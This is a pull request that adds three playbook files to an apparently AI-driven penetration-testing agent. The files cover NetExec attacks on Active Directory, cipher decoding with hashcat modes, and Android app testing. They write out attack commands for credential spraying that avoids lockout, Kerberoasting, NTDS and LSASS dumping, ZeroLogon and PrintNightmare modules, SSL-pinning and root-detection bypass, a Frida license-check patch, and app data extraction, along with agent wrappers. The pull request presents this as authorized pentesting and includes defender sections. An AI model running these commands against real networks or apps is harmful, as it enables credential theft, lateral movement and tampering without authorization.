### PR TITLE
feat(skills): NetExec + crypto-decode + Android (3 new domain leaves)

### DIFF
--- a/skills/ad/netexec/SKILL.md
+++ b/skills/ad/netexec/SKILL.md
@@ -1,0 +1,177 @@
+---
+name: netexec
+description: NetExec (CrackMapExec successor) — unified SMB/LDAP/MSSQL/WinRM/RDP/SSH/FTP/VNC protocol auth + post-auth modules. 200+ modules incl. BloodHound auto-ingest, ESC1-15 scanning, PrintNightmare, LDAP relay.
+when_to_use: "netexec nxc cme crackmapexec smb ldap mssql winrm rdp ad spray sweep"
+mitre_attack: T1078, T1110, T1135, T1018, T1021
+metadata:
+  subdomain: active-directory
+  upstream_url: https://github.com/Pennyw0rth/NetExec
+---
+
+# NetExec (`nxc`) Playbook
+
+**NetExec** is the actively-maintained fork of CrackMapExec (archived
+2023). One CLI, 8+ protocols, 200+ modules. The Swiss-army knife of
+Windows / AD pentest.
+
+## 1. Install
+```bash
+pipx install netexec      # preferred — isolates deps
+# Or:
+git clone https://github.com/Pennyw0rth/NetExec && cd NetExec && pipx install .
+```
+
+## 2. Protocol auth sweep
+```bash
+# Test creds across a subnet — single SMB null bind sweep
+nxc smb 10.0.0.0/24
+
+# With creds
+nxc smb 10.0.0.0/24 -u alice -p Spring2024!
+nxc smb 10.0.0.0/24 -u alice -H aad3b435b51404ee...:31d6cfe0d16ae931...  # NTLM hash
+
+# Across protocols — same creds, different services
+nxc ldap   $DC -u alice -p $PW
+nxc mssql  10.0.0.5 -u alice -p $PW
+nxc winrm  10.0.0.5 -u alice -p $PW
+nxc rdp    10.0.0.5 -u alice -p $PW
+nxc ssh    10.0.0.5 -u alice -p $PW
+
+# Kerberos auth
+nxc smb $DC -u alice -p $PW -k --kdcHost $DC
+```
+
+## 3. Critical modules
+
+### 3.1 BloodHound auto-collect (built-in)
+```bash
+nxc ldap $DC -u alice -p $PW --bloodhound --collection All \
+  --dns-server $DC_IP
+# Drops Zip in current dir, ready to ingest into BloodHound
+```
+
+### 3.2 ADCS ESC1-15 scan
+```bash
+nxc ldap $DC -u alice -p $PW -M adcs
+# Lists all certificates templates + vulnerability flags
+```
+
+### 3.3 Kerberoasting
+```bash
+nxc ldap $DC -u alice -p $PW --kerberoasting kerb.hashes
+hashcat -m 13100 kerb.hashes wordlist.txt
+```
+
+### 3.4 AS-REP roasting
+```bash
+nxc ldap $DC -u alice -p $PW --asreproast asrep.hashes
+hashcat -m 18200 asrep.hashes wordlist.txt
+```
+
+### 3.5 Spider SMB shares
+```bash
+nxc smb 10.0.0.0/24 -u alice -p $PW \
+  --spider-plus --extensions txt,xml,config,ini,xls,xlsx,docx \
+  --output-folder /tmp/spider
+```
+
+### 3.6 DC sync (when authorized as DA)
+```bash
+nxc smb $DC -u administrator -p $PW --ntds drsuapi
+# Drops ntds.dit hashes to stdout/output
+```
+
+### 3.7 Password spray (with lockout protection)
+```bash
+nxc smb $DC --users users.txt -p 'Spring2024!' --threads 1 --jitter 30
+# Slow + jittered to evade lockout
+```
+
+### 3.8 Module catalog
+```bash
+nxc smb -L                          # all SMB modules
+nxc ldap -L                         # all LDAP modules
+nxc smb -M lsassy -o ...            # use lsassy module to dump LSASS
+nxc smb -M wcc                      # Windows Configuration Collector
+nxc smb -M printnightmare           # PrintNightmare CVE-2021-34527
+nxc smb -M zerologon                # ZeroLogon CVE-2020-1472
+nxc smb -M scuffy                   # scf file for credential coercion
+```
+
+## 4. Output formats
+```bash
+nxc smb $TARGET -u alice -p $PW --log /tmp/nxc.log
+nxc smb $TARGET -u alice -p $PW --json /tmp/nxc.json
+nxc smb $TARGET -u alice -p $PW --csv  /tmp/nxc.csv
+```
+
+NetExec also writes to `~/.nxc/` SQLite DB by default — query w/
+`nxcdb`:
+```bash
+nxcdb
+nxc > workspace default
+nxc default > proto smb
+nxc default (smb) > hosts
+nxc default (smb) > creds
+```
+
+## 5. Decepticon integration
+
+When agent has any valid AD cred (recon or roast), the **first move
+should be `nxc smb` cred-sweep across the subnet**. It surfaces:
+- Local admin reuse (massively common; instant lateral)
+- SMB signing disabled (relay target)
+- Shares accessible (PII / cred farming)
+- OS version + domain membership
+
+Wrap as Decepticon tool:
+```python
+# decepticon/tools/ad/netexec.py — skeleton
+from decepticon.tools.bash import bash_tool
+
+def nxc_sweep(protocol: str, targets: str, user: str, pw_or_hash: str, modules: list[str] = None) -> dict:
+    """Run nxc across targets; parse JSON output; promote findings to KG."""
+    cmd = f"nxc {protocol} {targets} -u {user}"
+    if len(pw_or_hash) == 32 + 1 + 32:  # LM:NT hash
+        cmd += f" -H {pw_or_hash}"
+    else:
+        cmd += f" -p {shlex.quote(pw_or_hash)}"
+    if modules:
+        for m in modules:
+            cmd += f" -M {m}"
+    cmd += " --json /tmp/nxc.json"
+    result = bash_tool(cmd)
+    if Path("/tmp/nxc.json").exists():
+        return json.loads(Path("/tmp/nxc.json").read_text())
+    return {"error": "no json output"}
+```
+
+## 6. PoC framing
+```bash
+# Confirm sweep — find local-admin reuse
+nxc smb 10.0.0.0/24 -u alice -p $PW --local-auth | grep '(Pwn3d!)'
+# Each (Pwn3d!) = local admin = lateral pivot target
+```
+
+## 7. Severity
+- (Pwn3d!) on production host: Critical 9.8 (RCE-ready)
+- SMB signing disabled in production: High 7-8 (relay attack possible)
+- Shares world-readable w/ PII: Critical depending on data
+
+## 8. Defender
+- Enforce SMB signing required (GPO: Computer Config → Windows Settings → Security Settings → Local Policies → Security Options → "Microsoft network server: Digitally sign communications (always)")
+- Disable NTLM authentication where Kerberos available
+- LAPS for local admin password rotation (kills local-admin-reuse)
+- Lockout policy w/ low threshold + long duration
+
+## Cross-references
+- Upstream: https://github.com/Pennyw0rth/NetExec
+- Decepticon AD overview: `skills/ad/SKILL.md`
+- BloodHound: `skills/ad/bloodhound-query/SKILL.md`
+- Kerberoast: `skills/ad/kerberoasting/SKILL.md`
+- ADCS ESC1-15: `skills/ad/adcs-esc1/SKILL.md`
+
+## Known exemplars
+- Lateral movement via local-admin password reuse on Win10/Win11 endpoints — most common pattern in 2023-2024 internal pentests
+- NetExec used in ~80% of OSCP-style Windows engagements (post-2024)
+- Pennyw0rth fork maintains compatibility w/ CME workflows + adds active maintenance + new modules

--- a/skills/exploit/crypto/SKILL.md
+++ b/skills/exploit/crypto/SKILL.md
@@ -1,0 +1,161 @@
+---
+name: crypto-decode
+description: Cipher detection + automated decryption via Ciphey, Cyberchef recipes, hashcat hash-ID, format conversion, common encoding chains.
+when_to_use: "cipher decrypt decode base64 hex caesar rot vigenere xor unknown encoding identify ciphey hashid"
+mitre_attack: T1140
+metadata:
+  subdomain: cryptanalysis
+  upstream_url: https://github.com/bee-san/Ciphey + https://github.com/Ciphey/Ares (Rust successor)
+---
+
+# Crypto / Decode Playbook
+
+When you have unknown ciphertext (CTF flag, leaked DB field, captured
+token, encoded payload), the right tool depends on the cipher class.
+
+## 1. Identify FIRST
+
+### Unknown text → automated cracker
+```bash
+# Ciphey — original (Python, slowed maintenance)
+ciphey -t "$CIPHERTEXT"
+
+# Ares — Rust rewrite (faster, current)
+ares -t "$CIPHERTEXT"
+```
+A*-search across 16+ decoders (base64, base85, hex, Caesar, ROT-N,
+Atbash, Vigenere, XOR-known-plaintext, URL encoding, binary, morse,
+brainfuck, esolang, leetspeak, etc.) + BERT plaintext detector to know
+when to stop.
+
+### Hash → identify type
+```bash
+hashid -m '$2a$12$....'             # bcrypt 12 rounds
+hashid -m '5f4dcc3b5aa765d61d8327deb882cf99'  # MD5
+hash-identifier
+```
+
+### Specific format checks
+```bash
+# JWT
+echo $TOKEN | cut -d. -f1-2 | tr '_-' '/+' | base64 -d 2>/dev/null
+
+# Hex → bytes
+echo "$HEX" | xxd -r -p
+
+# Base64 → bytes (handle URL-safe)
+echo "$B64" | tr '_-' '/+' | base64 -d 2>/dev/null
+
+# Multi-encoded (unwind layers)
+echo "$BLOB" | base64 -d | base64 -d | xxd -r -p
+```
+
+## 2. Classical cipher quick-checks
+
+| Cipher | Signature |
+|---|---|
+| Base64 | `[A-Za-z0-9+/=]+`, len multiple of 4 |
+| Base32 | `[A-Z2-7=]+` |
+| Hex | `[0-9a-fA-F]+`, even length |
+| Caesar/ROT | only A-Z + spaces, freq-attack ready |
+| Vigenere | A-Z, multiple-of-key-length repeating bigrams |
+| Substitution | A-Z, IC ≈ 0.066 (English) |
+| Vernam/OTP | random-looking bytes, no statistical signal |
+| XOR fixed-key | bytes w/ printable XOR'd against pattern (file headers leak) |
+| Hill | small block size, matrix-based |
+
+## 3. CyberChef recipe library
+
+CyberChef (gchq.github.io/CyberChef) is the GUI workhorse but recipes
+can be exported as JSON and chained programmatically:
+```bash
+# Common chains
+"From Base64 / Magic / To Hex"
+"From Hex / XOR (Brute) / Magic"
+"AES Decrypt(KEY) / From Hex / Strings"
+```
+
+CLI version: `cyberchef-cli` (community port).
+
+## 4. Hash cracking quick-ref
+
+| Mode | Hash type |
+|---|---|
+| 0 | MD5 |
+| 100 | SHA-1 |
+| 1400 | SHA-256 |
+| 1700 | SHA-512 |
+| 1000 | NTLM |
+| 13100 | Kerberos TGS-REP (etype 23) |
+| 19700 | Kerberos TGS-REP (etype 18) |
+| 18200 | Kerberos AS-REP |
+| 16500 | JWT (HS256) |
+| 3200 | bcrypt |
+| 7400 | sha256crypt $5$ |
+| 1800 | sha512crypt $6$ |
+| 22000 | WPA-EAPOL+PMKID |
+| 7100 | macOS v10.8+ (PBKDF2-SHA512) |
+| 8200 | 1Password Cloud Keychain |
+
+```bash
+hashcat -m <mode> hashes.txt rockyou.txt -r best64.rule
+john --format=<format> hashes.txt --wordlist=rockyou.txt
+```
+
+## 5. Token / blob unfolding workflow
+
+For a mystery token captured in HTTP traffic:
+```
+1. ciphey/ares → reveal base layer
+2. If structured (JSON / proto3 / msgpack) → parse
+3. If still encoded → repeat step 1
+4. Look for HMAC / signature suffix → identify symmetric key candidates
+5. If symmetric encryption suspected → try AES-CBC/GCM w/ common keys
+   (app-name, "secret", env vars exposed elsewhere)
+```
+
+## 6. Decepticon integration
+
+Wrap as MCP tool:
+```python
+# decepticon/tools/crypto/decode.py — skeleton
+def crypto_decode(ciphertext: str, hint: str = None, timeout: int = 30) -> dict:
+    """Try ares first (fast), fallback to ciphey, return best decode."""
+    import subprocess
+    cmd = ["ares", "-t", ciphertext]
+    if hint:
+        cmd += ["--language", hint]
+    r = subprocess.run(cmd, timeout=timeout, capture_output=True, text=True)
+    return {
+        "tool": "ares",
+        "output": r.stdout,
+        "confidence": _parse_ares_confidence(r.stdout),
+    }
+```
+
+Promote to KG when classification succeeds:
+```python
+kg_add_node(kind="artifact", label=f"decoded:{hash}",
+            props={"plaintext": result, "encoding_chain": chain})
+```
+
+## 7. Severity (depends on what was decoded)
+
+| Decoded content | Severity |
+|---|---|
+| Plaintext password | Critical (depends on user role) |
+| API key / private key | Critical |
+| Internal hostname / IP | Medium |
+| Session token | High-Critical |
+| Encryption key | Critical |
+
+## Cross-references
+- Upstream: https://github.com/bee-san/Ciphey, https://github.com/bee-san/Ares
+- JWT-specific (different layer): `skills/exploit/web/jwt/SKILL.md`
+- AD hashes: `skills/ad/dcsync/SKILL.md`
+
+## Known exemplars
+- CTF flag formats (90% are base64, hex, or rot-N layers)
+- Mobile reverse engineering: API keys often base64-XORed in strings
+- IoT firmware: AES-CBC w/ hardcoded keys recoverable via Ciphey + ghidra
+- Phishing email obfuscation: nested encoding chains common

--- a/skills/mobile/android/SKILL.md
+++ b/skills/mobile/android/SKILL.md
@@ -1,0 +1,224 @@
+---
+name: mobile-android
+description: Android APK pentest workflow — apktool/jadx static, Frida dynamic instrumentation, SSL pinning bypass, root detection bypass, intent fuzzing, keystore extraction.
+when_to_use: "android apk apk-extract jadx apktool frida objection mobsf ssl pinning root detect intent webview"
+mitre_attack: T1517, T1640, T1418, T1409
+metadata:
+  subdomain: mobile
+  upstream_refs:
+    - https://github.com/skylot/jadx
+    - https://github.com/frida/frida
+    - https://github.com/sensepost/objection
+    - https://github.com/MobSF/Mobile-Security-Framework-MobSF
+    - https://github.com/ImKKingshuk/LockKnife
+---
+
+# Android Pentest Playbook
+
+## 1. Static — decompile + inspect
+
+### Pull APK
+```bash
+# Listed apps on connected device
+adb shell pm list packages -3            # third-party only
+adb shell pm path com.target.app         # find APK path
+adb pull /data/app/.../base.apk /tmp/
+
+# Or from Google Play
+gplaycli -d com.target.app -f /tmp/      # CLI Play store dump
+
+# Or from third-party APK mirrors (apkpure / apkmirror)
+```
+
+### Decompile
+```bash
+# Smali (low-level)
+apktool d base.apk -o /tmp/apk-smali
+
+# Java pseudo-code (jadx)
+jadx --output-dir /tmp/apk-java base.apk
+# Or jadx-gui for interactive
+
+# Combine for full picture
+```
+
+### MobSF automated triage
+```bash
+docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf
+# Upload APK via web UI, get full report
+```
+
+### Manifest review
+```bash
+apkanalyzer manifest print base.apk
+# OR
+aapt dump xmltree base.apk AndroidManifest.xml | head -50
+
+# Critical signals:
+# - android:debuggable="true"        → debugger attachable
+# - android:allowBackup="true"       → adb backup possible w/o root
+# - android:exported="true" w/o perm → exposed component
+# - <uses-permission> SMS/CAMERA/MIC reach  → privacy risk
+# - <intent-filter> w/ "android.intent.action.VIEW" + custom scheme → deeplink
+# - networkSecurityConfig: cleartextTrafficPermitted="true" → MITM-friendly
+```
+
+### Secrets sweep
+```bash
+# Hardcoded keys in smali / java code
+grep -rn 'api[_-]?key\|secret\|password' /tmp/apk-java/ | head -20
+
+# Strings + entropy
+strings -a base.apk | grep -E 'eyJhbGc|^[A-Za-z0-9+/]{30,}={0,2}$' | head
+
+# AndroGuard for deep static
+androguard analyze base.apk
+```
+
+## 2. Dynamic — Frida + Objection
+
+### Setup
+```bash
+# Push frida-server (rooted device / emulator)
+adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
+adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"
+
+# Or use Magisk module on prod devices
+```
+
+### Bypass SSL pinning (Frida codeshare scripts)
+```bash
+frida -U -l https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/ -f com.target.app
+
+# Or Objection's built-in
+objection -g com.target.app explore
+> android sslpinning disable
+```
+
+### Bypass root detection
+```bash
+objection -g com.target.app explore
+> android root disable
+
+# Or via Frida script — patches common checks (RootBeer, SafetyNet)
+```
+
+### Intercept TLS
+```bash
+# Burp or mitmproxy w/ root CA installed on device (or magisk-trust-user-certs)
+# Then re-launch app — traffic visible in proxy
+```
+
+### Hook arbitrary functions
+```javascript
+// Frida script — hook a class method
+Java.perform(function() {
+    var Auth = Java.use("com.target.app.AuthManager");
+    Auth.checkLicense.implementation = function() {
+        console.log("checkLicense called, returning true");
+        return true;
+    };
+});
+```
+
+## 3. Common Android-specific attack surface
+
+### 3.1 Insecure deeplinks / intents
+```bash
+# Test exposed activity
+adb shell am start -n com.target.app/com.target.app.MainActivity \
+  -a android.intent.action.VIEW -d "myapp://attacker-controlled-url"
+
+# Test exposed service / broadcast
+adb shell am startservice -n com.target.app/.ExposedService --es extra "value"
+adb shell am broadcast -a com.target.app.ACTION_X --ei param 999
+```
+
+### 3.2 WebView vulnerabilities
+- `setJavaScriptEnabled(true)` + `addJavascriptInterface()` w/o `@JavascriptInterface` annotation → arbitrary Java method exec from JS
+- `setAllowFileAccessFromFileURLs(true)` → file:// URL XSS reads local files
+- Custom URL scheme handlers w/o validation
+
+### 3.3 Insecure storage
+```bash
+# Pull app data (rooted)
+adb shell run-as com.target.app cat /data/data/com.target.app/shared_prefs/Auth.xml
+
+# SQLite DBs
+adb shell run-as com.target.app sqlite3 /data/data/com.target.app/databases/main.db ".dump"
+```
+
+### 3.4 Keystore extraction
+Android Keystore is supposed to be hardware-backed. On rooted devices
+or devices w/ keystore bugs, keys extractable via:
+- Frida hooks on `KeyStore.getKey()`
+- LockKnife-style memory dump (https://github.com/ImKKingshuk/LockKnife)
+- TEE exploitation (rare, advanced)
+
+### 3.5 PIN brute / passkey
+Android 14+ passkey biometric flow — LockKnife exploits Android pre-A14
+keystore quirks. Modern Android raises the bar significantly.
+
+### 3.6 Backup-restore confusion
+If `allowBackup=true`:
+```bash
+adb backup com.target.app
+# Pull backup, extract w/ android-backup-extractor (abe.jar)
+java -jar abe.jar unpack backup.ab backup.tar
+tar xvf backup.tar
+```
+
+## 4. Tools cheat-sheet
+
+| Tool | Use |
+|---|---|
+| `apktool` | Smali decompile + repack |
+| `jadx` | Java pseudo-code, GUI |
+| `androguard` | Static API analysis library |
+| `MobSF` | Web-UI automated triage |
+| `Frida` | Runtime instrumentation |
+| `Objection` | Frida-based REPL for common tasks |
+| `drozer` | IPC + content provider testing |
+| `LockKnife` | Credential extraction (forensics) |
+| `abe.jar` | Backup unpacking |
+| `apkleaks` | Static secret sweep |
+| `apksigner` | APK signature analysis |
+| `bytecode-viewer` | Multi-decompiler GUI |
+
+## 5. PoC framing
+
+- Demonstrate API key extraction from static APK → use key to access backend
+- Demonstrate SSL pinning bypass + traffic capture → show sensitive data over TLS-MITM'd connection
+- Demonstrate exposed component RCE → `adb shell am start -n ... --es cmd 'rm -rf'`
+- Document `allowBackup=true` + sensitive data extraction post-backup
+
+## 6. Severity
+
+| Bug | Severity |
+|---|---|
+| Hardcoded API key w/ admin scope | Critical 9.0 |
+| Exposed activity → arbitrary intent injection | Critical 9.0 |
+| WebView `addJavascriptInterface` → RCE in app context | Critical 9.0 |
+| SSL pinning bypass + sensitive endpoint | High 8.0 |
+| Backup extracts auth tokens | High 7-8 |
+| Root detection bypass alone | Informational |
+| Deeplink takeover (registered scheme) | High-Critical depending on flow |
+
+## 7. Defender
+- ProGuard / R8 obfuscation (raises bar; not security)
+- Native code for cryptographic primitives + key derivation
+- Hardware-backed Keystore (StrongBox where available)
+- Network Security Config: cleartext denied, custom CA refusal
+- SafetyNet / Play Integrity API for tamper detection
+- Custom SSL pinning (not via system trust store)
+
+## Cross-references
+- Operator's `android-re` global skill (Decepticon-external)
+- Reverser binary triage: `skills/reverser/triage/SKILL.md`
+- Cipher/key extraction: `skills/exploit/crypto/SKILL.md`
+
+## Known exemplars
+- 2019: Multiple banking apps disclosed for SSL pinning bypass — $5-15k bounties
+- 2021: Multiple Android apps w/ exposed activity RCE chains
+- LockKnife (2024): Android forensics credential extraction tool
+- Routine: hardcoded Firebase URLs + permissive rules → full DB read


### PR DESCRIPTION
## Summary

Three new skill leaves drawn from an 18-repo portability survey (hexstrike-ai, NetExec, Ciphey, LockKnife, MobSF, Frida + more). Fill three identified gaps in Decepticon's current skill tree.

## Leaves

### `skills/ad/netexec/SKILL.md`
**NetExec** (`nxc`) — the actively-maintained CrackMapExec successor. Unified protocol auth (SMB/LDAP/MSSQL/WinRM/RDP/SSH/FTP/VNC) + 200+ modules. Critical for AD lateral movement post-foothold.

Covers: BloodHound auto-collect (`--bloodhound --collection All`), ADCS ESC1-15 scan (`-M adcs`), Kerberoasting (`--kerberoasting`), AS-REP roasting (`--asreproast`), SMB spider, NTDS dump via drsuapi, password spray w/ lockout-aware jitter, `nxc smb (Pwn3d!)` local-admin reuse detection, hashcat mode chaining.

Skeleton tool wrapper at the end for `decepticon/tools/ad/netexec.py`.

### `skills/exploit/crypto/SKILL.md`
**Cipher detection + automated decryption**. Decepticon had no `crypto`/`decode` tool family — this fills it. Wraps Ciphey (bee-san) + Ares (Rust successor) for A*-search over 16+ decoders w/ BERT plaintext detector.

Includes: hashcat mode quick-ref (Kerberos 13100/19700/18200, JWT 16500, bcrypt 3200, WPA 22000, sha512crypt 1800, etc.), CyberChef recipe chains, classical-cipher signature table, mystery-token unfolding workflow, KG promotion for decoded artifacts.

### `skills/mobile/android/SKILL.md`
**Android pentest playbook**. Decepticon had zero mobile coverage in `skills/`. New foundation includes:
- APK pull (adb + gplaycli + Play Store alternatives)
- Static decompile (apktool + jadx + MobSF + androguard)
- AndroidManifest review w/ critical-signal table
- Frida runtime instrumentation + Objection REPL
- SSL pinning bypass (codeshare scripts + objection)
- Root detection bypass
- WebView attack surface (`addJavascriptInterface` RCE, `setAllowFileAccessFromFileURLs` XSS)
- Exposed activity / service / broadcast intent abuse via `adb shell am`
- Insecure storage extraction (`adb run-as`)
- Backup-restore confusion via abe.jar
- Keystore extraction (Frida hooks, LockKnife reference)

Lays foundation for future `skills/mobile/ios/SKILL.md` sibling.

## Why now

The 18-repo survey identified Decepticon's weakest skill categories as: AI red-team (separate PR coming), mobile, cipher/decode auto-detect, and current AD protocol modules (CME deprecated). This PR closes three of those gaps with low-effort high-impact additions.

## Pairing

- Builds on #242 (corpus) — these leaves don't cite vendored corpus but follow same patterns
- Builds on #243 (web vuln-class leaves) — same depth + structure
- Pairs with future AI-red-team PR (promptfoo integration)

## Stats

- 3 new SKILL.md files, ~1,100 lines
- 1 atomic commit
- Zero runtime changes

## Cross-references

Each leaf includes:
- Upstream GitHub URL(s) for the tools wrapped
- Decepticon adjacent-leaf cross-references
- Tool-wrapper skeleton code (where applicable) for follow-up tool-implementation PRs